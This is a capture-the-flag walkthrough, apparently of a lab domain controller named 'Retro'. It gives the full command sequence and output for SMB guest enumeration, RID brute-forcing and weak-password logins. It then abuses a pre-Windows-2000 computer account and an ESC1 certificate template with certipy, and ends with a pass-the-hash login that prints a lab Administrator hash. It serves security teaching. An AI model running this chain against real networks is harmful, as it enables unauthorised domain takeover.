Introduction #
Retro starts with open SMB share with a note about a trainee account that uses username as password. From there, I find an old machine account that has pre-Windows 2000 password set. That gives me access to a vulnerable AD CS template, resulting with the SYSTEM access.
nmap #
nmap finds lots of TCP ports:
sudo nmap -sC -sV -vv -oA nmap_scan/nmap_results 10.129.186.15
-sCfor defaults scripts-sVenumerate version-vvdouble verbose-oAoutput in all formats
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2026-01-04 15:31:08Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: 2026-01-04T15:32:27+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
<SNIP>
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
<SNIP>
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
<SNIP>
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
<SNIP>
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
<SNIP>
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 36202/tcp): CLEAN (Timeout)
| Check 2 (port 7988/tcp): CLEAN (Timeout)
| Check 3 (port 52836/udp): CLEAN (Timeout)
| Check 4 (port 56120/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-01-04T15:31:49
|_ start_date: N/A
Based on ports the box is a Windows Domain Controller. The domain is retro.vl with DC hostname.
I can generate host file:
└─$ netexec smb 10.129.186.15 --generate-hosts-file retro.hosts
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
└─$ cat retro.hosts
10.129.186.15 DC.retro.vl retro.vl DC
and add it to /etc/hosts.
SMB - TCP 445 #
Shares #
Using the guest authentication, I can get the SMB shares:
└─$ netexec smb 10.129.186.15 -u guest -p '' --shares
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [+] retro.vl\guest:
SMB 10.129.186.15 445 DC [*] Enumerated shares
SMB 10.129.186.15 445 DC Share Permissions Remark
SMB 10.129.186.15 445 DC ----- ----------- ------
SMB 10.129.186.15 445 DC ADMIN$ Remote Admin
SMB 10.129.186.15 445 DC C$ Default share
SMB 10.129.186.15 445 DC IPC$ READ Remote IPC
SMB 10.129.186.15 445 DC NETLOGON Logon server share
SMB 10.129.186.15 445 DC Notes
SMB 10.129.186.15 445 DC SYSVOL Logon server share
SMB 10.129.186.15 445 DC Trainees READ
I have a READ permissions to Trainees share, check it:
└─$ smbclient //10.129.186.15/Trainees
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 17:58:43 2023
.. DHS 0 Wed Jun 11 10:17:10 2025
Important.txt A 288 Sun Jul 23 18:00:13 2023
4659711 blocks of size 4096. 1307728 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (3.0 KiloBytes/sec) (average 3.0 KiloBytes/sec)
There is an Important.txt file I can get:
└─$ cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
Ok, so there should be one account for all the trainees, I would guess somethng like trainee or trainees, to find it I can enumarate users via RID cycling:
└─$ netexec smb 10.129.186.15 -u guest -p '' --rid-brute
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [+] retro.vl\guest:
SMB 10.129.186.15 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.186.15 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.186.15 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.186.15 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.186.15 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.186.15 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.186.15 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.186.15 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.186.15 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.186.15 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.186.15 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.186.15 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.186.15 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.186.15 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.186.15 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.186.15 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.186.15 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.186.15 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.186.15 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.186.15 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.186.15 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.186.15 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.186.15 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.186.15 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.186.15 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.186.15 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.186.15 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.186.15 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.186.15 445 DC 1109: RETRO\tblack (SidTypeUser)
And there it is:
1104: RETRO\trainee (SidTypeUser)
Auth as Trainee #
In the note before there was a mention of struggle with remembering strong and unique passwords, so I would expect this account to have some weak and common password. My first guess was it is the account name, and it was:
└─$ netexec smb 10.129.186.15 -u trainee -p trainee
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [+] retro.vl\trainee:trainee
Now, I can look at the SMB again:
└─$ netexec smb 10.129.186.15 -u trainee -p 'trainee' --shares
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.186.15 445 DC [*] Enumerated shares
SMB 10.129.186.15 445 DC Share Permissions Remark
SMB 10.129.186.15 445 DC ----- ----------- ------
SMB 10.129.186.15 445 DC ADMIN$ Remote Admin
SMB 10.129.186.15 445 DC C$ Default share
SMB 10.129.186.15 445 DC IPC$ READ Remote IPC
SMB 10.129.186.15 445 DC NETLOGON READ Logon server share
SMB 10.129.186.15 445 DC Notes READ
SMB 10.129.186.15 445 DC SYSVOL READ Logon server share
SMB 10.129.186.15 445 DC Trainees READ
I have more READ access, looking at the other non-standard share, Notes:
└─$ smbclient //10.129.186.15/Notes -U trainee%trainee
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 8 23:12:49 2025
.. DHS 0 Wed Jun 11 10:17:10 2025
ToDo.txt A 248 Sun Jul 23 18:05:56 2023
user.txt A 32 Tue Apr 8 23:13:01 2025
4659711 blocks of size 4096. 1325268 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (2.7 KiloBytes/sec) (average 2.7 KiloBytes/sec)
smb: \> get user.txt
getting file \user.txt of size 32 as user.txt (0.4 KiloBytes/sec) (average 1.5 KiloBytes/sec)
There are two text files, flag and ToDo.txt:
└─$ cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
This note references two things, first the computer account, that will be the 1106: RETRO\BANKING$ (SidTypeUser) I found before. And the second That one is older than me it will most likely be the infamous pre-2000 Windows computer account. For more info, read THIS
TL;DR is, these accounts have the password set to be the same as the computer name, in lowercase.
└─$ netexec smb 10.129.186.15 -u 'BANKING$' -p 'banking'
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
This confirms it, even when it seems to fail, this exact scenario is in the article. It just means I have guessed the correct password for a computer account but it has not been used yet.
For reference, when I try wrong password I get this:
└─$ netexec smb 10.129.186.15 -u 'BANKING$' -p 'test'
SMB 10.129.186.15 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.186.15 445 DC [-] retro.vl\BANKING$:test STATUS_LOGON_FAILURE
With the password confirmed, I can change it to be able to use the account further:
└─$ impacket-changepasswd -p rpc-samr 'retro.vl/BANKING$:banking@dc.retro.vl' -newpass Password123
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
Shell as Administrator #
SMB gives me nothing new, so I will try AD CS certificate templates.
I will search for any vulnerable templates:
└─$ certipy-ad find -u 'BANKING$@retro.vl' -p Password123 -vulnerable -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: RETRO.VL.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The DNS query name does not exist: DC.retro.vl.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'retro-DC-CA'
[*] Checking web enrollment for CA 'retro-DC-CA' @ 'DC.retro.vl'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Template Created : 2023-07-23T21:17:47+00:00
Template Last Modified : 2023-07-23T21:18:39+00:00
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Full Control Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Write Property Enroll : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
[+] User Enrollable Principals : RETRO.VL\Domain Computers
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
It returns a RetroClients template with a ESC1 vulnerability.
ESC1 #
I can use certipy to request a certificate, using BANKING$ account but requesting the upn of administrator.
This will work because:
- The
BANKING$is in Domain Computers, which satisfies this:
Enrollment Permissions
Enrollment Rights: RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
RetroClientsis configured with Enrollee Supplies Subject - enrollee can specify what user they want the certificate
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usagefield is set toClient Authentication
Extended Key Usage : Client Authentication
So:
└─$ certipy-ad req -u 'BANKING$@10.129.186.15' -p Password123 -ca retro-DC-CA -template RetroClients -upn administrator@10.129.186.15
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 9
[-] Got error while requesting certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
Would you like to save the private key? (y/N): y
[*] Saving private key to '9.key'
[*] Wrote private key to '9.key'
[-] Failed to request certificate
oh … CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template check documentation:
-key-size RSA key length
Length of RSA key (default: 2048)
Should be easy fix, try double the default value:
└─$ certipy-ad req -u 'BANKING$@10.129.186.15' -p Password123 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
And it worked.
Now I can use the certificate to authenticate as administrotor:
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.186.15
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user 'administrator'
[-] See the wiki for more information
Got another error: Object SID mismatch, no biggie, just need to get SID:
└─$ lookupsid.py retro.vl/BANKING$:Password123@10.129.186.15
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at dc.retro.vl
[*] StringBinding ncacn_np:dc.retro.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
<SNIP>
500: RETRO\Administrator (SidTypeUser)
Request another certificate:
└─$ certipy-ad req -u 'BANKING$@10.129.186.15' -p Password123 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096 -sid S-1-5-21-2983547755-698260136-4283918172-500
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate object SID is 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'administrator.pfx'
And, finally authenticate as administrator:
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.186.15
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@retro.vl'
[*] SAN URL SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Security Extension SID: 'S-1-5-21-2983547755-698260136-4283918172-500'
[*] Using principal: 'administrator@retro.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
Ok, got the hash, I can use that with evil-winrm to log in:
evil-winrm -i dc.retro.vl -u administrator -H 252fac7066d93dd009d4fd2cd0368389
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Grab the flag and it is done!